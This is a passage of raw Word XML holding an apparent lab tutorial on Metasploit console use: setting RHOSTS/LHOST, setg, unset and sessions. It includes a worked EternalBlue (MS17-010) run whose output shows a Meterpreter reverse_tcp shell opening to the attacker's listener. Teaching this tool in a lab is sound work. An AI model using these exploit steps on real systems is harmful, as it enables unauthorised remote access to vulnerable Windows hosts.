          <w:numId w:val="10"/>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A shell on the target system:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Once the exploit is completed, you may have access to a command shell on the target system. This is a regular command line, and all commands typed here run on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FC1A0"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10840F6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C:\Windows\system32&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F10F9"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As mentioned earlier,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212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command will list all available parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354AE94A"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show options command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E484A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7AC1495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428610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7C20420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C93097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2FDF407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           ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA24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5A12415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096208A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10F33BF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5E508D9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53555E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0D157E9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0CA6BA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4BCC2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DE4EAF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Payload options (windows/x64/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216A8B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A53946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4370188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3E6A550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EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104CC0C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LHOST     10.10.44.70      yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8CD7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LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A0C7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FC1EB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9345B1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4897ECD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66636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7E012C9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0E181D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4E3A55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FC2C6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B40BC6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1D88390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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0055DA"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As you can see in the screenshot above, some of these parameters require a value for the exploit to work. Some required parameter values will be pre-populated, make sure you check if these should remain the same for your target. For example, a web exploit could have an RPORT (remote port: the port on the target system Metasploit will try to connect to and run the exploit) value preset to 80, but your target web application could be using port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA484A"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In this example, we will set the RHOSTS parameter to the IP address of our target system using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE40C48"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4AB8185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set rhosts 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138AE14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rhosts =&gt; 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F13D8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2ED3457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A1D51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51D828A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9D2A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6471463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689F122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10.10.165.39     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398762A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19E0019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41A92FA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12951B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7D4988D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0914CB4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7DC7046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02058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39A88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Payload options (windows/x64/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6302B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B063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BDA0B2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56EAA03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EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211885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LHOST     10.10.44.70      yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A959E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LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC13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AA43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F6190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612C150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2FEA2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103621D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07BC5EB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608A5B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EF140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CE0B96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24362C64"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4D51CF1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Once you have set a parameter, you can use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0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command to check the value was set correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5682B29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6F0A5A1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Parameters you will often use are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B301620" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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RHOSTS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> “Remote host”, the IP address of the target system. A single IP address or a network range can be set. This will support the CIDR (Classless Inter-Domain Routing) notation (/24, /16, etc.) or a network range (10.10.10.x – 10.10.10.y). You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt, as you can see below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECDB2BF" w14:textId="750726FA"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noProof/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49CE610A" wp14:editId="49F5C804">
            <wp:extent cx="5943600" cy="2041525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193974969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9699" name="Picture 1" descr="A screenshot of a computer pro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41525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F4399"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RPORT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> “Remote port”, the port on the target system the vulnerable application is running on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE101F2"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PAYLOAD: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The payload you will use with the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614980D"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LHOST:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19FD37"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LPORT:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine, and you can set it to any port not used by any other application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531426A8"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SESSION:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Each connection established to the target system using Metasploit will have a session ID. You will use this with post-exploitation modules that will connect to the target system using an existing connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471BE8A7"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14B91E8B"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override any set parameter using the set command again with a different value. You can also clear any parameter value using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unset</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command or clear all set parameters with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unset</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> all command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5861A"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p>
    <w:p w14:paraId="4686517C"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unset all command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0EB2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unset all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7ACA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Flushing datastore...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C12AC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5493C86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47BC74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5B998B1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7910E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3B8B105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60FEB4F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26706B8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41D8E13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SMBDomain      .                no        (Optional) The Windows domain to use for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384410E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2648802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466907A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658317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406E96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D85C3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F999CD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03230ED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2FE32E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1CF413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5AA8735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0B5CCE1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AC57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F5509F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2C6B3B7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28D6328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use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to set values that will be used for all modules.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is used like the set command. The difference is that if you use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command to set a value using a module and you switch to another module, you will need to set the value again.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allows you to set the value so it can be used by default across different modules. You can clear any value set with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using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unsetg</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E4D00"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08BCC38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example below uses the following flow;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6EE29"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the ms17_010_eternalblue exploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B70FD"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set the RHOSTS variable using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instead of the set command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA686F"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command to leave the exploit context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618551F3"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an auxiliary (this module is a scanner to discover MS17-010 vulnerabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A5B922"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0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command shows the RHOSTS parameter is already populated with the IP address of the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC2FBC"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Navigating modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608005B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msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68A6E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No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6FEA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setg rhosts 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4ECC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rhosts =&gt; 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C04B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back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD3DA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&gt; use auxiliary/scanner/smb/smb_ms17_010 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F284A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auxiliary(scanner/smb/smb_ms17_010) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8175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045D8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(auxiliary/scanner/smb/smb_ms17_010):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8557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877670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77B787F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56E849E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CHECK_ARCH   true                                                           no        Check for architecture on vulnerable hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867F2D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CHECK_DOPU   true                                                           no        Check for DOUBLEPULSAR on vulnerable hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD01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CHECK_PIPE   false                                                          no        Check for named pipe on vulnerable hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784A1A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NAMED_PIPES  /opt/metasploit-framework-5101/data/wordlists/named_pipes.txt  yes       List of named pipes to check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163960A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10.10.165.39                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323CAA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SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60ECF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The Windows domain to use for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F42C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The password for the specified username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00629D7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The username to authenticate as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FED1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THREADS      1                                                              yes       The number of concurrent threads (max one per host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497880A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EC45F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auxiliary(scanner/smb/smb_ms17_010) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459AAE"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3E4BDFA6"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sets a global value that will be used until you exit Metasploit or clear it using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unsetg</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCFC65B"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60F99634"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7"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Using modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204408D"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Once all module parameters are set, you can launch the module using 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Metasploit also supports the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command, which is an alias created for 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as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D3E22"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t>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can be used without any parameters or using the “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-z</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>” parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB5812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exploit -z</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command will run the exploit and background the session as soon as it opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029B1F5"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exploit -z command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9CBB3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exploit -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C774E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3DC285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Started reverse TCP handler on 10.10.44.70:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30057A5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Using auxiliary/scanner/smb/smb_ms17_010 as check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32129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Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF5E2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Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CAF1D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Connecting to target for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC23B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Connection established for exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1F05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Target OS selected valid for OS indicated by SMB reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD94B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CORE raw buffer dump (42 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D008C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10.10.12.229:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED864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10.10.12.229:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3244E5F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10.10.12.229:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18366F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10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BBAC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Trying exploit with 12 Groom Allocations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8493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all but last fragment of exploit packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604CB6F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Starting non-paged pool grooming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1302C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SMBv2 buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F8F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Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0097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final SMBv2 buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6D40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last fragment of exploit packet!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0319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Receiving response from exploit packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C023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ETERNALBLUE overwrite completed successfully (0xC000000D)!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CE77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egg to corrupted connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7CB7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Triggering free of corrupted buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36067AC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Sending stage (201283 bytes) to 10.10.12.229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A06A7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Meterpreter session 2 opened (10.10.44.70:4444 -&gt; 10.10.12.229:49186) at 2021-08-20 02:06:48 +0100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72208EE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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617E91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=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5542C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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EF09E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Session 2 created in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BE5A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5886A98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t>This will return you the context prompt from which you have run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122D37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Some modules support the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> option. This will check if the target system is vulnerable without exploiting it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70188A1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7876CE8D"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7"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DEDF9A"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0134CB7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use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command to background the session prompt and go back to the msfconsole prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616EA11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6C270DA3"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lastRenderedPageBreak/>
        <w:t>Backgrounding sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314317B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meterpreter &gt; background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F241F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Backgrounding session 2...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9832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exploit(windows/smb/ms17_010_eternalblue) &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A95FD"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57A8E4AC"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Alternatively, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
